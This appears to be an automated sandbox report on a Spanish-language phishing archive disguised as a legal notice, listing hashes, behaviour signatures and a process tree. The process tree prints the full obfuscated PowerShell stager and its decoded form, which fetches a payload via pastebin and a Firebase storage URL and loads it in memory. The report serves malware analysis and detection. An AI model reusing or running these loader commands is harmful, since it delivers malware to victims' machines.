Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-10-2024 15:26

General

  • Target

    NOTIFICACION_DE_DEMANDA#231020241709000000.rar

  • Size

    4KB

  • MD5

    f7cb6479dec54c3907bbd3d80d95b50d

  • SHA1

    128d531233e1e9e6326c87fe86d465ada070e5b9

  • SHA256

    ac9b91fe056ac0a7bd3a0a93ded223b6a50e6fa6bec10b56ad5d5df731c2de0b

  • SHA512

    310637484733767af24df44fa115734afa94d5b49c610710064c080887cc56fc2054e724ff19402925b127ef25c3c927d1a8d17eed3607b780edf151d22cf531

  • SSDEEP

    96:mD79tRp/pquH3pr6z6C7zd5ezyFJVOB6FPAZK6epvVVjmZE:yZbG+priHd5a8PVB5e2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\NOTIFICACION_DE_DEMANDA#231020241709000000.rar"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO81A9B9F6\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Br☆Gc☆ZwBw☆Go☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆H☆☆cwBh☆GE☆dg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆cQB1☆Gg☆b☆Bh☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆cQB1☆Gg☆b☆Bh☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBm☆GU☆YgBi☆GU☆NQBl☆GQ☆Zg☆y☆GQ☆Zg☆t☆Dk☆ZQ☆y☆GI☆LQ☆5☆DE☆Z☆☆0☆C0☆Yg☆z☆GQ☆Yg☆t☆Dc☆YwBm☆DY☆MwBk☆DI☆N☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Mw☆y☆C0☆d☆Bh☆HI☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆DM☆M☆☆y☆DI☆Nw☆t☆GU☆cgBi☆HU☆d☆Bj☆G8☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bw☆HM☆YQBh☆HY☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆F8☆c☆B1☆Ho☆dgBi☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Br☆Gc☆ZwBw☆Go☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\7zO81A9B9F6\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs');powershell $KByHL;
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$kggpj = '0';$psaav = 'C:\Users\Admin\AppData\Local\Temp\7zO81A9B9F6\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $quhla = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($quhla).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('febbe5edf2df-9e2b-91d4-b3db-7cf63d24=nekot&aidem=tla?txt.4202-01-32-tarcd/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $psaav , '_____puzvb_______________________________________-------', $kggpj, '1', 'Roda' ));"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2744
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Br☆Gc☆ZwBw☆Go☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆H☆☆cwBh☆GE☆dg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆cQB1☆Gg☆b☆Bh☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆cQB1☆Gg☆b☆Bh☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBm☆GU☆YgBi☆GU☆NQBl☆GQ☆Zg☆y☆GQ☆Zg☆t☆Dk☆ZQ☆y☆GI☆LQ☆5☆DE☆Z☆☆0☆C0☆Yg☆z☆GQ☆Yg☆t☆Dc☆YwBm☆DY☆MwBk☆DI☆N☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Mw☆y☆C0☆d☆Bh☆HI☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆DM☆M☆☆y☆DI☆Nw☆t☆GU☆cgBi☆HU☆d☆Bj☆G8☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bw☆HM☆YQBh☆HY☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆F8☆c☆B1☆Ho☆dgBi☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Br☆Gc☆ZwBw☆Go☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Desktop\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$kggpj = '0';$psaav = 'C:\Users\Admin\Desktop\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $quhla = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($quhla).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('febbe5edf2df-9e2b-91d4-b3db-7cf63d24=nekot&aidem=tla?txt.4202-01-32-tarcd/o/moc.topsppa.30227-erbutco/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $psaav , '_____puzvb_______________________________________-------', $kggpj, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2716

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7zO81A9B9F6\NOTIFICACION_DE_DEMANDA#231020241709000000.vbs

    Filesize

    8.9MB

    MD5

    6872587aacd35fad8bcc50d46cac9bec

    SHA1

    d9e606614a14ac0f368ef9e19ef043bc9e9bc76e

    SHA256

    7eb65f78fd002384dc1cf76a0dc4a8b15514f179b300d1612b791728261dc483

    SHA512

    75e4438043bd4832be8b47a174132cc7c49ebfc92780435d3212b6838339a4ae2c023ba6d9ce104696bdb300279f0609c93d793c1a707b950a83bff53841df56

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    764b2526fc900b1e2051eaa212b1116d

    SHA1

    37d467d4e3991417d0f37395c07e88c05ae85a0b

    SHA256

    538aadded2e193b9dd092a86af4a632baeac92832f3aee2e129701f0c1b176a7

    SHA512

    5030796261c59e48f98f49e5d7d46f7373b50c747beacbbd6060c0e70bd6720d1382a830ae0aa0d557b24e0ff8f6f6d3f17fe6f38d6367b728a38dbbdfd5702d

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/2748-9-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2748-10-0x0000000002310000-0x0000000002318000-memory.dmp

    Filesize

    32KB

  • memory/3064-25-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

  • memory/3064-26-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB